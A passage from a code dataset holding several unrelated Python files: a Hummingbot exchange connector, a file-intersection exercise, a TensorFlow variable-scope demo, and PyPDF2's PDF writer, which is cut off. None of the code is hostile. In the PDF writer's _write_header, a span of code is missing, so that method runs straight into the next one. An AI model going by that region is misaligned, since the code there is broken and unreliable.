NotImplementedError:\n raise\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().exception(\"Unexpected error while running the transactions check process\", exc_info=True)\n await self._sleep(0.5)\n\n async def _check_orders_creation_transactions(self):\n orders: List[GatewayInFlightOrder] = self._order_tracker.active_orders.values()\n orders_by_creation_tx = defaultdict(list)\n orders_with_inconsistent_hash = []\n\n for order in orders:\n if order.creation_transaction_hash is not None and order.is_pending_create:\n orders_by_creation_tx[order.creation_transaction_hash].append(order)\n\n for transaction_hash, orders in orders_by_creation_tx.items():\n all_orders = orders.copy()\n try:\n order_updates = await self._data_source.order_updates_for_transaction(\n transaction_hash=transaction_hash, spot_orders=orders\n )\n\n for order_update in order_updates:\n tracked_order = self._order_tracker.active_orders.get(order_update.client_order_id)\n if tracked_order is not None:\n all_orders.remove(tracked_order)\n if (tracked_order.exchange_order_id is not None\n and tracked_order.exchange_order_id != order_update.exchange_order_id):\n tracked_order.update_exchange_order_id(order_update.exchange_order_id)\n orders_with_inconsistent_hash.append(tracked_order)\n self._order_tracker.process_order_update(order_update=order_update)\n\n for not_found_order in all_orders:\n self._update_order_after_failure(\n order_id=not_found_order.client_order_id,\n trading_pair=not_found_order.trading_pair\n )\n\n except ValueError:\n self.logger().debug(f\"Transaction not included in a block yet ({transaction_hash})\")\n\n if len(orders_with_inconsistent_hash) > 0:\n async with self._data_source.order_creation_lock:\n active_orders = [\n order for order in self._order_tracker.active_orders.values()\n if order not in orders_with_inconsistent_hash and order.current_state == OrderState.PENDING_CREATE\n ]\n await self._data_source.reset_order_hash_generator(active_orders=active_orders)\n\n async def _check_created_orders_status_for_transaction(self, transaction_hash: str):\n transaction_orders = []\n order: GatewayInFlightOrder\n for order in self.in_flight_orders.values():\n if order.creation_transaction_hash == transaction_hash and order.is_pending_create:\n transaction_orders.append(order)\n\n if len(transaction_orders) > 0:\n order_updates = await self._data_source.order_updates_for_transaction(\n transaction_hash=transaction_hash, spot_orders=transaction_orders\n )\n\n for order_update in order_updates:\n tracked_order = self._order_tracker.active_orders.get(order_update.client_order_id)\n if (tracked_order is not None\n and tracked_order.exchange_order_id is not None\n and tracked_order.exchange_order_id != order_update.exchange_order_id):\n tracked_order.update_exchange_order_id(order_update.exchange_order_id)\n self._order_tracker.process_order_update(order_update=order_update)\n\n async def _process_queued_orders(self):\n while True:\n try:\n await self._cancel_and_create_queued_orders()\n sleep_time = (self.clock.tick_size * 0.5\n if self.clock is not None\n else self._orders_processing_delta_time)\n await self._sleep(sleep_time)\n except NotImplementedError:\n raise\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().exception(\"Unexpected error while processing queued individual orders\", exc_info=True)\n await self._sleep(self.clock.tick_size * 0.5)\n\n async def _cancel_and_create_queued_orders(self):\n if len(self._orders_queued_to_cancel) > 0:\n orders = [order.to_limit_order() for order in self._orders_queued_to_cancel]\n self._orders_queued_to_cancel = []\n await self._execute_batch_cancel(orders_to_cancel=orders)\n if len(self._orders_queued_to_create) > 0:\n orders = self._orders_queued_to_create\n self._orders_queued_to_create = []\n await self._execute_batch_inflight_order_create(inflight_orders_to_create=orders)\n\n async def _get_last_traded_price(self, trading_pair: str) -> float:\n market_id = await self.exchange_symbol_associated_to_pair(trading_pair=trading_pair)\n last_price = await self._data_source.last_traded_price(market_id=market_id)\n return float(last_price)\n\n def _get_poll_interval(self, timestamp: float) -> float:\n last_recv_diff = timestamp - self._last_received_message_timestamp\n poll_interval = (\n self.SHORT_POLL_INTERVAL\n if last_recv_diff > self.TICK_INTERVAL_LIMIT\n else self.LONG_POLL_INTERVAL\n )\n return poll_interval\n","sub_path":"hummingbot/connector/exchange/injective_v2/injective_v2_exchange.py","file_name":"injective_v2_exchange.py","file_ext":"py","file_size_in_byte":47056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"306181441","text":"\"\"\"\nCreate two data files, each with a set of names, one per line.\n\tNow, write a program that reads both files and lists only those names that are in both files.\n\tThe two file names should be supplied on the command line.\n\"\"\"\n#!/usr/bin/env python3\nimport sys\n\nfile1 = open(sys.argv[1], 'r')\n\nfor line1 in file1:\n\tfile2 = open(sys.argv[2], 'r')\n\tfor line2 in file2:\n\t\tif line1 == line2:\n\t\t\tprint(line1, end=\"\")\n\tfile2.close()\n\nfile1.close()\n\n","sub_path":"Exercises/01_intro_Python3/eightFive.py","file_name":"eightFive.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"429325269","text":"\nimport numpy as np;\nimport tensorflow as tf;\n\n#-----------------------------------------------\n\ndef relu_layer(i):\n\n\tw = tf.get_variable('w', shape = (10, 10), initializer = tf.random_normal_initializer());\n\tb = tf.get_variable('b', shape = (1, 10), initializer = tf.random_normal_initializer());\n\n\tu = tf.matmul(i, w) + b;\n\to = tf.nn.relu(u);\n\n\treturn o;\n\n#-----------------------------------------------\n\ni = tf.placeholder(tf.float32, shape = (1, 10), name = 'i');\n\n#-----------------------------------------------\n\n# with tf.variable_scope('name')\n# with tf.variable_scope('name', resue = True)\n# with tf.variable_scope('name', initializer = initializer)\n\nwith tf.variable_scope('layer_1') as scope:\n\tlayer_1 = relu_layer(i);\n\nwith tf.variable_scope('layer_2') as scope:\n\tlayer_2 = relu_layer(layer_1);\n\n#-----------------------------------------------\n\nwith tf.Session() as session:\n\n\tsession.run(tf.initialize_all_variables());\n\n\tresult = session.run(layer_1, feed_dict = {i : np.zeros((1, 10))});\n\n\tsummary_writer = tf.train.SummaryWriter('tmp');\n\tsummary_writer.add_graph(session.graph);\n\n\tprint(result);","sub_path":"examples/tensorflow-basics/variable_sharing.py","file_name":"variable_sharing.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"187845520","text":"# Copyright (c) 2006, Mathieu Fenniak\n# Copyright (c) 2007, Ashish Kulkarni \n#\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * The name of the author may not be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nimport codecs\nimport decimal\nimport logging\nimport random\nimport struct\nimport time\nimport uuid\nimport warnings\nfrom hashlib import md5\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, Union, cast\n\nfrom ._page import PageObject, _VirtualList\nfrom ._reader import PdfReader\nfrom ._security import _alg33, _alg34, _alg35\nfrom ._utils import StreamType, b_, deprecate_with_replacement\nfrom .constants import CatalogAttributes as CA\nfrom .constants import Core as CO\nfrom .constants import EncryptionDictAttributes as ED\nfrom .constants import PageAttributes as PG\nfrom .constants import PagesAttributes as PA\nfrom .constants import StreamAttributes as SA\nfrom .constants import TrailerKeys as TK\nfrom .generic import (\n ArrayObject,\n BooleanObject,\n ByteStringObject,\n ContentStream,\n DecodedStreamObject,\n Destination,\n DictionaryObject,\n FloatObject,\n IndirectObject,\n NameObject,\n NullObject,\n NumberObject,\n PdfObject,\n RectangleObject,\n StreamObject,\n TextStringObject,\n TreeObject,\n _create_bookmark,\n create_string_object,\n)\nfrom .types import (\n BookmarkTypes,\n BorderArrayType,\n FitType,\n LayoutType,\n PagemodeType,\n ZoomArgsType,\n ZoomArgType,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass PdfWriter:\n \"\"\"\n This class supports writing PDF files out, given pages produced by another\n class (typically :class:`PdfReader`).\n \"\"\"\n\n def __init__(self) -> None:\n self._header = b\"%PDF-1.3\"\n self._objects: List[Optional[PdfObject]] = [] # array of indirect objects\n self._idnum_hash: Dict[bytes, int] = {}\n\n # The root of our page tree node.\n pages = DictionaryObject()\n pages.update(\n {\n NameObject(PA.TYPE): NameObject(\"/Pages\"),\n NameObject(PA.COUNT): NumberObject(0),\n NameObject(PA.KIDS): ArrayObject(),\n }\n )\n self._pages = self._add_object(pages)\n\n # info object\n info = DictionaryObject()\n info.update(\n {\n NameObject(\"/Producer\"): create_string_object(\n codecs.BOM_UTF16_BE + \"PyPDF2\".encode(\"utf-16be\")\n )\n }\n )\n self._info = self._add_object(info)\n\n # root object\n root = DictionaryObject()\n root.update(\n {\n NameObject(PA.TYPE): NameObject(CO.CATALOG),\n NameObject(CO.PAGES): self._pages,\n }\n )\n self._root: Optional[IndirectObject] = None\n self._root_object = root\n\n def _add_object(self, obj: Optional[PdfObject]) -> IndirectObject:\n self._objects.append(obj)\n return IndirectObject(len(self._objects), 0, self)\n\n def get_object(self, ido: IndirectObject) -> PdfObject:\n if ido.pdf != self:\n raise ValueError(\"pdf must be self\")\n return self._objects[ido.idnum - 1] # type: ignore\n\n def getObject(self, ido: IndirectObject) -> PdfObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`get_object` instead.\n \"\"\"\n deprecate_with_replacement(\"getObject\", \"get_object\")\n return self.get_object(ido)\n\n def _add_page(\n self, page: PageObject, action: Callable[[Any, IndirectObject], None]\n ) -> None:\n assert page[PA.TYPE] == CO.PAGE\n page[NameObject(PA.PARENT)] = self._pages\n page_ind = self._add_object(page)\n pages = cast(DictionaryObject, self.get_object(self._pages))\n action(pages[PA.KIDS], page_ind)\n page_count = cast(int, pages[PA.COUNT])\n pages[NameObject(PA.COUNT)] = NumberObject(page_count + 1)\n\n def set_need_appearances_writer(self) -> None:\n # See 12.7.2 and 7.7.2 for more information:\n # http://www.adobe.com/content/dam/acom/en/devnet/acrobat/pdfs/PDF32000_2008.pdf\n try:\n catalog = self._root_object\n # get the AcroForm tree\n if \"/AcroForm\" not in catalog:\n self._root_object.update(\n {\n NameObject(\"/AcroForm\"): IndirectObject(\n len(self._objects), 0, self\n )\n }\n )\n\n need_appearances = NameObject(\"/NeedAppearances\")\n self._root_object[\"/AcroForm\"][need_appearances] = BooleanObject(True) # type: ignore\n\n except Exception as exc:\n logger.error(\"set_need_appearances_writer() catch : \", repr(exc))\n\n def add_page(self, page: PageObject) -> None:\n \"\"\"\n Add a page to this PDF file. The page is usually acquired from a\n :class:`PdfReader` instance.\n\n :param PageObject page: The page to add to the document. Should be\n an instance of :class:`PageObject`\n \"\"\"\n self._add_page(page, list.append)\n\n def addPage(self, page: PageObject) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_page` instead.\n \"\"\"\n deprecate_with_replacement(\"addPage\", \"add_page\")\n self.add_page(page)\n\n def insert_page(self, page: PageObject, index: int = 0) -> None:\n \"\"\"\n Insert a page in this PDF file. The page is usually acquired from a\n :class:`PdfReader` instance.\n\n :param PageObject page: The page to add to the document. This\n argument should be an instance of :class:`PageObject`.\n :param int index: Position at which the page will be inserted.\n \"\"\"\n self._add_page(page, lambda l, p: l.insert(index, p))\n\n def insertPage(self, page: PageObject, index: int = 0) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`insert_page` instead.\n \"\"\"\n deprecate_with_replacement(\"insertPage\", \"insert_page\")\n self.insert_page(page, index)\n\n def get_page(\n self, page_number: Optional[int] = None, pageNumber: Optional[int] = None\n ) -> PageObject:\n \"\"\"\n Retrieve a page by number from this PDF file.\n\n :param int page_number: The page number to retrieve\n (pages begin at zero)\n :return: the page at the index given by *page_number*\n :rtype: :class:`PageObject`\n \"\"\"\n if pageNumber is not None: # pragma: no cover\n if page_number is not None:\n raise ValueError(\"Please only use the page_number parameter\")\n else:\n deprecate_with_replacement(\n \"get_page(pageNumber)\", \"get_page(page_number)\", \"4.0.0\"\n )\n page_number = pageNumber\n if page_number is None and pageNumber is None: # pragma: no cover\n raise ValueError(\"Please specify the page_number\")\n pages = cast(Dict[str, Any], self.get_object(self._pages))\n # TODO: crude hack\n return pages[PA.KIDS][page_number].get_object()\n\n def getPage(self, pageNumber: int) -> PageObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :code:`writer.pages[page_number]` instead.\n \"\"\"\n deprecate_with_replacement(\"getPage\", \"writer.pages[page_number]\")\n return self.get_page(pageNumber)\n\n def _get_num_pages(self) -> int:\n \"\"\"\n :return: the number of pages.\n :rtype: int\n \"\"\"\n pages = cast(Dict[str, Any], self.get_object(self._pages))\n return int(pages[NameObject(\"/Count\")])\n\n def getNumPages(self) -> int: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :code:`len(writer.pages)` instead.\n \"\"\"\n deprecate_with_replacement(\"getNumPages\", \"len(writer.pages)\")\n return self._get_num_pages()\n\n @property\n def pages(self) -> List[PageObject]:\n \"\"\"\n Property that emulates a list of :class:`PageObject`\n \"\"\"\n return _VirtualList(self._get_num_pages, self.get_page) # type: ignore\n\n def add_blank_page(\n self, width: Optional[float] = None, height: Optional[float] = None\n ) -> PageObject:\n \"\"\"\n Append a blank page to this PDF file and returns it. If no page size\n is specified, use the size of the last page.\n\n :param float width: The width of the new page expressed in default user\n space units.\n :param float height: The height of the new page expressed in default\n user space units.\n :return: the newly appended page\n :rtype: :class:`PageObject`\n :raises PageSizeNotDefinedError: if width and height are not defined\n and previous page does not exist.\n \"\"\"\n page = PageObject.create_blank_page(self, width, height)\n self.add_page(page)\n return page\n\n def addBlankPage(\n self, width: Optional[float] = None, height: Optional[float] = None\n ) -> PageObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_blank_page` instead.\n \"\"\"\n deprecate_with_replacement(\"addBlankPage\", \"add_blank_page\")\n return self.add_blank_page(width, height)\n\n def insert_blank_page(\n self,\n width: Optional[decimal.Decimal] = None,\n height: Optional[decimal.Decimal] = None,\n index: int = 0,\n ) -> PageObject:\n \"\"\"\n Insert a blank page to this PDF file and returns it. If no page size\n is specified, use the size of the last page.\n\n :param float width: The width of the new page expressed in default user\n space units.\n :param float height: The height of the new page expressed in default\n user space units.\n :param int index: Position to add the page.\n :return: the newly appended page\n :rtype: :class:`PageObject`\n :raises PageSizeNotDefinedError: if width and height are not defined\n and previous page does not exist.\n \"\"\"\n if width is None or height is None and (self._get_num_pages() - 1) >= index:\n oldpage = self.pages[index]\n width = oldpage.mediabox.width\n height = oldpage.mediabox.height\n page = PageObject.create_blank_page(self, width, height)\n self.insert_page(page, index)\n return page\n\n def insertBlankPage(\n self,\n width: Optional[decimal.Decimal] = None,\n height: Optional[decimal.Decimal] = None,\n index: int = 0,\n ) -> PageObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`insertBlankPage` instead.\n \"\"\"\n deprecate_with_replacement(\"insertBlankPage\", \"insert_blank_page\")\n return self.insert_blank_page(width, height, index)\n\n def add_js(self, javascript: str) -> None:\n \"\"\"\n Add Javascript which will launch upon opening this PDF.\n\n :param str javascript: Your Javascript.\n\n >>> output.add_js(\"this.print({bUI:true,bSilent:false,bShrinkToFit:true});\")\n # Example: This will launch the print window when the PDF is opened.\n \"\"\"\n js = DictionaryObject()\n js.update(\n {\n NameObject(PA.TYPE): NameObject(\"/Action\"),\n NameObject(\"/S\"): NameObject(\"/JavaScript\"),\n NameObject(\"/JS\"): NameObject(f\"({javascript})\"),\n }\n )\n js_indirect_object = self._add_object(js)\n\n # We need a name for parameterized javascript in the pdf file, but it can be anything.\n js_string_name = str(uuid.uuid4())\n\n js_name_tree = DictionaryObject()\n js_name_tree.update(\n {\n NameObject(\"/JavaScript\"): DictionaryObject(\n {\n NameObject(CA.NAMES): ArrayObject(\n [create_string_object(js_string_name), js_indirect_object]\n )\n }\n )\n }\n )\n self._add_object(js_name_tree)\n\n self._root_object.update(\n {\n NameObject(\"/OpenAction\"): js_indirect_object,\n NameObject(CA.NAMES): js_name_tree,\n }\n )\n\n def addJS(self, javascript: str) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_js` instead.\n \"\"\"\n deprecate_with_replacement(\"addJS\", \"add_js\")\n return self.add_js(javascript)\n\n def add_attachment(self, filename: str, data: Union[str, bytes]) -> None:\n \"\"\"\n Embed a file inside the PDF.\n\n :param str filename: The filename to display.\n :param str data: The data in the file.\n\n Reference:\n https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/PDF32000_2008.pdf\n Section 7.11.3\n \"\"\"\n # We need three entries:\n # * The file's data\n # * The /Filespec entry\n # * The file's name, which goes in the Catalog\n\n # The entry for the file\n # Sample:\n # 8 0 obj\n # <<\n # /Length 12\n # /Type /EmbeddedFile\n # >>\n # stream\n # Hello world!\n # endstream\n # endobj\n\n file_entry = DecodedStreamObject()\n file_entry.set_data(data)\n file_entry.update({NameObject(PA.TYPE): NameObject(\"/EmbeddedFile\")})\n\n # The Filespec entry\n # Sample:\n # 7 0 obj\n # <<\n # /Type /Filespec\n # /F (hello.txt)\n # /EF << /F 8 0 R >>\n # >>\n\n ef_entry = DictionaryObject()\n ef_entry.update({NameObject(\"/F\"): file_entry})\n\n filespec = DictionaryObject()\n filespec.update(\n {\n NameObject(PA.TYPE): NameObject(\"/Filespec\"),\n NameObject(\"/F\"): create_string_object(\n filename\n ), # Perhaps also try TextStringObject\n NameObject(\"/EF\"): ef_entry,\n }\n )\n\n # Then create the entry for the root, as it needs a reference to the Filespec\n # Sample:\n # 1 0 obj\n # <<\n # /Type /Catalog\n # /Outlines 2 0 R\n # /Pages 3 0 R\n # /Names << /EmbeddedFiles << /Names [(hello.txt) 7 0 R] >> >>\n # >>\n # endobj\n\n embedded_files_names_dictionary = DictionaryObject()\n embedded_files_names_dictionary.update(\n {\n NameObject(CA.NAMES): ArrayObject(\n [create_string_object(filename), filespec]\n )\n }\n )\n\n embedded_files_dictionary = DictionaryObject()\n embedded_files_dictionary.update(\n {NameObject(\"/EmbeddedFiles\"): embedded_files_names_dictionary}\n )\n # Update the root\n self._root_object.update({NameObject(CA.NAMES): embedded_files_dictionary})\n\n def addAttachment(\n self, fname: str, fdata: Union[str, bytes]\n ) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_attachment` instead.\n \"\"\"\n deprecate_with_replacement(\"addAttachment\", \"add_attachment\")\n return self.add_attachment(fname, fdata)\n\n def append_pages_from_reader(\n self,\n reader: PdfReader,\n after_page_append: Optional[Callable[[PageObject], None]] = None,\n ) -> None:\n \"\"\"\n Copy pages from reader to writer. Includes an optional callback parameter\n which is invoked after pages are appended to the writer.\n\n :param reader: a PdfReader object from which to copy page\n annotations to this writer object. The writer's annots\n will then be updated\n :callback after_page_append (function): Callback function that is invoked after\n each page is appended to the writer. Callback signature:\n :param writer_pageref (PDF page reference): Reference to the page\n appended to the writer.\n \"\"\"\n # Get page count from writer and reader\n reader_num_pages = len(reader.pages)\n writer_num_pages = len(self.pages)\n\n # Copy pages from reader to writer\n for rpagenum in range(reader_num_pages):\n reader_page = reader.pages[rpagenum]\n self.add_page(reader_page)\n writer_page = self.pages[writer_num_pages + rpagenum]\n # Trigger callback, pass writer page as parameter\n if callable(after_page_append):\n after_page_append(writer_page)\n\n def appendPagesFromReader(\n self,\n reader: PdfReader,\n after_page_append: Optional[Callable[[PageObject], None]] = None,\n ) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`append_pages_from_reader` instead.\n \"\"\"\n deprecate_with_replacement(\"appendPagesFromReader\", \"append_pages_from_reader\")\n self.append_pages_from_reader(reader, after_page_append)\n\n def update_page_form_field_values(\n self, page: PageObject, fields: Dict[str, Any], flags: int = 0\n ) -> None:\n \"\"\"\n Update the form field values for a given page from a fields dictionary.\n Copy field texts and values from fields to page.\n If the field links to a parent object, add the information to the parent.\n\n :param page: Page reference from PDF writer where the annotations\n and field data will be updated.\n :param fields: a Python dictionary of field names (/T) and text\n values (/V)\n :param flags: An integer (0 to 7). The first bit sets ReadOnly, the\n second bit sets Required, the third bit sets NoExport. See\n PDF Reference Table 8.70 for details.\n \"\"\"\n self.set_need_appearances_writer()\n # Iterate through pages, update field values\n for j in range(len(page[PG.ANNOTS])): # type: ignore\n writer_annot = page[PG.ANNOTS][j].get_object() # type: ignore\n # retrieve parent field values, if present\n writer_parent_annot = {} # fallback if it's not there\n if PG.PARENT in writer_annot:\n writer_parent_annot = writer_annot[PG.PARENT]\n for field in fields:\n if writer_annot.get(\"/T\") == field:\n writer_annot.update(\n {NameObject(\"/V\"): TextStringObject(fields[field])}\n )\n if flags:\n writer_annot.update({NameObject(\"/Ff\"): NumberObject(flags)})\n elif writer_parent_annot.get(\"/T\") == field:\n writer_parent_annot.update(\n {NameObject(\"/V\"): TextStringObject(fields[field])}\n )\n\n def updatePageFormFieldValues(\n self, page: PageObject, fields: Dict[str, Any], flags: int = 0\n ) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`update_page_form_field_values` instead.\n \"\"\"\n deprecate_with_replacement(\n \"updatePageFormFieldValues\", \"update_page_form_field_values\"\n )\n return self.update_page_form_field_values(page, fields, flags)\n\n def clone_reader_document_root(self, reader: PdfReader) -> None:\n \"\"\"\n Copy the reader document root to the writer.\n\n :param reader: PdfReader from the document root should be copied.\n :callback after_page_append:\n \"\"\"\n self._root_object = cast(DictionaryObject, reader.trailer[TK.ROOT])\n\n def cloneReaderDocumentRoot(self, reader: PdfReader) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`clone_reader_document_root` instead.\n \"\"\"\n deprecate_with_replacement(\n \"cloneReaderDocumentRoot\", \"clone_reader_document_root\"\n )\n self.clone_reader_document_root(reader)\n\n def clone_document_from_reader(\n self,\n reader: PdfReader,\n after_page_append: Optional[Callable[[PageObject], None]] = None,\n ) -> None:\n \"\"\"\n Create a copy (clone) of a document from a PDF file reader\n\n :param reader: PDF file reader instance from which the clone\n should be created.\n :callback after_page_append (function): Callback function that is invoked after\n each page is appended to the writer. Signature includes a reference to the\n appended page (delegates to appendPagesFromReader). Callback signature:\n\n :param writer_pageref (PDF page reference): Reference to the page just\n appended to the document.\n \"\"\"\n self.clone_reader_document_root(reader)\n self.append_pages_from_reader(reader, after_page_append)\n\n def cloneDocumentFromReader(\n self,\n reader: PdfReader,\n after_page_append: Optional[Callable[[PageObject], None]] = None,\n ) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`clone_document_from_reader` instead.\n \"\"\"\n deprecate_with_replacement(\n \"cloneDocumentFromReader\", \"clone_document_from_reader\"\n )\n self.clone_document_from_reader(reader, after_page_append)\n\n def encrypt(\n self,\n user_pwd: str,\n owner_pwd: Optional[str] = None,\n use_128bit: bool = True,\n permissions_flag: int = -1,\n ) -> None:\n \"\"\"\n Encrypt this PDF file with the PDF Standard encryption handler.\n\n :param str user_pwd: The \"user password\", which allows for opening\n and reading the PDF file with the restrictions provided.\n :param str owner_pwd: The \"owner password\", which allows for\n opening the PDF files without any restrictions. By default,\n the owner password is the same as the user password.\n :param bool use_128bit: flag as to whether to use 128bit\n encryption. When false, 40bit encryption will be used. By default,\n this flag is on.\n :param unsigned int permissions_flag: permissions as described in\n TABLE 3.20 of the PDF 1.7 specification. A bit value of 1 means the\n permission is grantend. Hence an integer value of -1 will set all\n flags.\n Bit position 3 is for printing, 4 is for modifying content, 5 and 6\n control annotations, 9 for form fields, 10 for extraction of\n text and graphics.\n \"\"\"\n if owner_pwd is None:\n owner_pwd = user_pwd\n if use_128bit:\n V = 2\n rev = 3\n keylen = int(128 / 8)\n else:\n V = 1\n rev = 2\n keylen = int(40 / 8)\n P = permissions_flag\n O = ByteStringObject(_alg33(owner_pwd, user_pwd, rev, keylen))\n ID_1 = ByteStringObject(md5(b_(repr(time.time()))).digest())\n ID_2 = ByteStringObject(md5(b_(repr(random.random()))).digest())\n self._ID = ArrayObject((ID_1, ID_2))\n if rev == 2:\n U, key = _alg34(user_pwd, O, P, ID_1)\n else:\n assert rev == 3\n U, key = _alg35(user_pwd, rev, keylen, O, P, ID_1, False)\n encrypt = DictionaryObject()\n encrypt[NameObject(SA.FILTER)] = NameObject(\"/Standard\")\n encrypt[NameObject(\"/V\")] = NumberObject(V)\n if V == 2:\n encrypt[NameObject(SA.LENGTH)] = NumberObject(keylen * 8)\n encrypt[NameObject(ED.R)] = NumberObject(rev)\n encrypt[NameObject(ED.O)] = ByteStringObject(O)\n encrypt[NameObject(ED.U)] = ByteStringObject(U)\n encrypt[NameObject(ED.P)] = NumberObject(P)\n self._encrypt = self._add_object(encrypt)\n self._encrypt_key = key\n\n def write(self, stream: StreamType) -> None:\n \"\"\"\n Write the collection of pages added to this object out as a PDF file.\n\n :param stream: An object to write the file to. The object must support\n the write method and the tell method, similar to a file object.\n \"\"\"\n if hasattr(stream, \"mode\") and \"b\" not in stream.mode:\n warnings.warn(\n f\"File <{stream.name}> to write to is not in binary mode. \" # type: ignore\n \"It may not be written to correctly.\"\n )\n\n if not self._root:\n self._root = self._add_object(self._root_object)\n\n external_reference_map: Dict[Any, Any] = {}\n\n # PDF objects sometimes have circular references to their /Page objects\n # inside their object tree (for example, annotations). Those will be\n # indirect references to objects that we've recreated in this PDF. To\n # address this problem, PageObject's store their original object\n # reference number, and we add it to the external reference map before\n # we sweep for indirect references. This forces self-page-referencing\n # trees to reference the correct new object location, rather than\n # copying in a new copy of the page object.\n for obj_index, obj in enumerate(self._objects):\n if isinstance(obj, PageObject) and obj.indirect_ref is not None:\n data = obj.indirect_ref\n if data.pdf not in external_reference_map:\n external_reference_map[data.pdf] = {}\n if data.generation not in external_reference_map[data.pdf]:\n external_reference_map[data.pdf][data.generation] = {}\n external_reference_map[data.pdf][data.generation][\n data.idnum\n ] = IndirectObject(obj_index + 1, 0, self)\n\n self.stack: List[int] = []\n self._sweep_indirect_references(external_reference_map, self._root)\n del self.stack\n\n object_positions = self._write_header(stream)\n xref_location = self._write_xref_table(stream, object_positions)\n self._write_trailer(stream)\n stream.write(b_(f\"\\nstartxref\\n{xref_location}\\n%%EOF\\n\")) # eof\n\n def _write_header(self, stream: StreamType) -> List[int]:\n object_positions = []\n stream.write(self._header + b\"\\n\")\n stream.write(b\"%\\xE2\\xE3\\xCF\\xD3\\n\")\n for i, obj in enumerate(self._objects):\n obj = self._objects[i]\n # If the obj is None we can't write anything\n if obj is not None:\n idnum = i + 1\n object_positions.append(stream.tell())\n stream.write(b_(str(idnum)) + b\" 0 obj\\n\")\n key = None\n if hasattr(self, \"_encrypt\") and idnum != self._encrypt.idnum:\n pack1 = struct.pack(\" int:\n xref_location = stream.tell()\n stream.write(b\"xref\\n\")\n stream.write(b_(f\"0 {len(self._objects) + 1}\\n\"))\n stream.write(b_(f\"{0:0>10} {65535:0>5} f \\n\"))\n for offset in object_positions:\n stream.write(b_(f\"{offset:0>10} {0:0>5} n \\n\"))\n return xref_location\n\n def _write_trailer(self, stream: StreamType) -> None:\n stream.write(b\"trailer\\n\")\n trailer = DictionaryObject()\n trailer.update(\n {\n NameObject(TK.SIZE): NumberObject(len(self._objects) + 1),\n NameObject(TK.ROOT): self._root,\n NameObject(TK.INFO): self._info,\n }\n )\n if hasattr(self, \"_ID\"):\n trailer[NameObject(TK.ID)] = self._ID\n if hasattr(self, \"_encrypt\"):\n trailer[NameObject(TK.ENCRYPT)] = self._encrypt\n trailer.write_to_stream(stream, None)\n\n def add_metadata(self, infos: Dict[str, Any]) -> None:\n \"\"\"\n Add custom metadata to the output.\n\n :param dict infos: a Python dictionary where each key is a field\n and each value is your new metadata.\n \"\"\"\n args = {}\n for key, value in list(infos.items()):\n args[NameObject(key)] = create_string_object(value)\n self.get_object(self._info).update(args) # type: ignore\n\n def addMetadata(self, infos: Dict[str, Any]) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_metadata` instead.\n \"\"\"\n deprecate_with_replacement(\"addMetadata\", \"add_metadata\")\n self.add_metadata(infos)\n\n def _sweep_indirect_references(\n self,\n extern_map: Dict[Any, Any],\n data: Union[\n ArrayObject,\n BooleanObject,\n DictionaryObject,\n FloatObject,\n IndirectObject,\n NameObject,\n PdfObject,\n NumberObject,\n TextStringObject,\n NullObject,\n ],\n ) -> Union[Any, StreamObject]:\n if isinstance(data, DictionaryObject):\n for key, value in list(data.items()):\n value = self._sweep_indirect_references(extern_map, value)\n if isinstance(value, StreamObject):\n # a dictionary value is a stream. streams must be indirect\n # objects, so we need to change this value.\n value = self._add_object(value)\n data[key] = value\n return data\n elif isinstance(data, 